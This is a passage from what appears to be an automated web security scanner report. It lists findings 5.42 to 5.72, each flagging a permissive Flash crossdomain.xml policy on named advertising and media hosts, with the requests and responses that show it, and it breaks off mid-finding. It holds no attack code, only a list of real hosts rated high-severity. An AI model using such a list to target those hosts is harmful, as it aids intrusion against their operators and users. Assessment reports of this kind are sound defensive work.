ETag: W/"200-1315340584000"
Last-Modified: Tue, 06 Sep 2011 20:23:04 GMT
Content-Type: application/xml
Content-Length: 200
Date: Sat, 17 Sep 2011 16:30:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.42. http://content.aggregateknowledge.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.aggregateknowledge.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.aggregateknowledge.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sat, 17 Sep 2011 16:43:23 GMT
ETag: "3530268-120-4820a717ace00"
Last-Modified: Thu, 18 Mar 2010 03:01:12 GMT
Server: ECS (sjo/5227)
X-Cache: HIT
Content-Length: 288
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-p
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.43. http://d.agkn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.agkn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.agkn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"219-1313398290000"
Last-Modified: Mon, 15 Aug 2011 08:51:30 GMT
Content-Type: application/xml
Content-Length: 219
Date: Sat, 17 Sep 2011 16:39:39 GMT
Connection: close

<?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
    <allow-access-from domain="*" />
    </cr
...[SNIP]...
5.44. http://dc.kaboodle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc.kaboodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dc.kaboodle.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:31:59 GMT
Server: Omniture DC/2.0.0
xserver: www280
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
5.45. http://dis.criteo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dis.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Sat, 17 Sep 2011 16:43:47 GMT
Expires: Tue, 11 Sep 2012 16:43:47 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...
5.46. http://ds.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Sat, 17 Sep 2011 16:23:48 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

5.47. http://edge.aperture.displaymarketplace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://edge.aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:1b76"
Server: Microsoft-IIS/6.0
X-Server: D2A.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Sat, 17 Sep 2011 16:38:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 16:38:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...
5.48. http://edge1.catalog.video.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge1.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge1.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1bfbe6a41d40cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 766712
Date: Sat, 17 Sep 2011 16:30:01 GMT
Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT
Expires: Thu, 22 Sep 2011 19:31:29 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>
5.49. http://edge3.catalog.video.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge3.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge3.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1bfbe6a41d40cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 177
Age: 70610
Date: Sat, 17 Sep 2011 16:30:22 GMT
Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT
Expires: Fri, 30 Sep 2011 20:53:32 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>
5.50. http://event.adxpose.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1313179768000"
Last-Modified: Fri, 12 Aug 2011 20:09:28 GMT
Content-Type: application/xml
Content-Length: 203
Date: Sat, 17 Sep 2011 16:39:35 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...
5.51. http://events.seattlepi.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.seattlepi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: events.seattlepi.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 26 May 2011 23:14:54 GMT
Server: nginx/0.6.39
Date: Sat, 17 Sep 2011 06:07:44 GMT
Expires: Sun, 18 Sep 2011 06:07:44 GMT
Cache-Control: max-age=86400
Age: 37134
X-Cache: HIT from squid1.admin.zvents.com
X-Cache-Lookup: HIT from squid1.admin.zvents.com:3128
Via: 1.0 squid1.admin.zvents.com (squid/3.1.4)
Proxy-Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
5.52. http://events.stamfordadvocate.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.stamfordadvocate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: events.stamfordadvocate.com

Response

HTTP/1.0 200 OK
Server: nginx/0.6.39
Date: Sat, 17 Sep 2011 16:23:09 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 16 Jun 2011 17:39:28 GMT
Expires: Sun, 18 Sep 2011 16:23:09 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
X-Cache: MISS from squid1.admin.zvents.com
X-Cache-Lookup: HIT from squid1.admin.zvents.com:3128
Via: 1.0 squid1.admin.zvents.com (squid/3.1.4)
Proxy-Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
5.53. http://external.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:29:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.54. http://eyewond.fcod.llnwd.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://eyewond.fcod.llnwd.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: eyewond.fcod.llnwd.net

Response

HTTP/1.0 200 OK
Pragma: no-cache
Content-Length: 187
Server: FlashCom/4.0.2
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>
5.55. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 17 Sep 2011 02:48:16 GMT
Expires: Sat, 17 Sep 2011 02:46:06 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 49663
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.56. http://g-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 16:25:13 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
5.57. http://g.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g.msn.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 09 Oct 2008 18:52:49 GMT
Accept-Ranges: bytes
ETag: "fee1eb39402ac91:0"
Server: Microsoft-IIS/7.5
Date: Sat, 17 Sep 2011 16:45:17 GMT
Connection: keep-alive
Content-Length: 104

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.58. http://goku.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goku.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: goku.brightcove.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:40:41 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 116
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>
5.59. http://hearst.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hearst.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: hearst.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:06 GMT
Server: Omniture DC/2.0.0
xserver: www408
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
5.60. http://hearstmagazines.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hearstmagazines.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: hearstmagazines.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:21:17 GMT
Server: Omniture DC/2.0.0
xserver: www415
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
5.61. http://hfm.checkm8.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: hfm.checkm8.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:31:41 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
ETag: "1315710718"
Last-Modified: Sun, 11-Sep-2011 03:11:58 GMT
Age: 0
Cache-Control: max-age=86400
Content-Length: 106
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
5.62. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:24:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Sat, 04-Sep-2021 16:24:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
5.63. http://image.ugo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.ugo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: image.ugo.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:29:11 GMT
Server: Apache
Last-Modified: Wed, 24 Feb 2010 15:50:59 GMT
ETag: "6782d-1d2-4805aa1ee3ec0"
Accept-Ranges: bytes
Content-Length: 466
Cache-Control: max-age=180
Expires: Sat, 17 Sep 2011 16:32:11 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=390, max=4878
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.ugo.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.c.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...
5.64. http://img.widgets.video.s-msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.widgets.video.s-msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.widgets.video.s-msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "2b71bb10d242cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 170
Date: Sat, 17 Sep 2011 16:28:02 GMT
Last-Modified: Fri, 15 Jul 2011 09:32:07 GMT
Expires: Sun, 18 Sep 2011 16:28:02 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
5.65. http://img1.catalog.video.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img1.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img1.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1bfbe6a41d40cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 177
Age: 634800
Date: Sat, 17 Sep 2011 16:32:42 GMT
Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT
Expires: Sat, 24 Sep 2011 08:12:42 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>
5.66. http://img2.catalog.video.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img2.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img2.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1bfbe6a41d40cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 50754
Date: Sat, 17 Sep 2011 16:34:42 GMT
Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT
Expires: Sat, 01 Oct 2011 02:28:48 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>
5.67. http://img3.catalog.video.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img3.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img3.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1bfbe6a41d40cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 177
Age: 634655
Date: Sat, 17 Sep 2011 16:30:17 GMT
Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT
Expires: Sat, 24 Sep 2011 08:12:42 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>
5.68. http://img4.catalog.video.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img4.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img4.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1bfbe6a41d40cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 177
Age: 99726
Date: Sat, 17 Sep 2011 16:32:17 GMT
Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT
Expires: Fri, 30 Sep 2011 12:50:10 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>
5.69. http://js.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:27:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.70. http://load.exelator.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: load.exelator.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1452731550"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Sat, 17 Sep 2011 16:44:07 GMT
Server: HTTP server
Connection: close
Via: 1.1 AN-AMP_TM uproxy-2

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>
5.71. http://load.tubemogul.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://load.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: load.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1313195678000"
Last-Modified: Sat, 13 Aug 2011 00:34:38 GMT
host: rcv-srv30
Content-Type: application/xml
Content-Length: 204
Date: Sat, 17 Sep 2011 16:40:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...
5.72. http://loadus.exelator.com/crossdomain.xml  previous  next

Summary

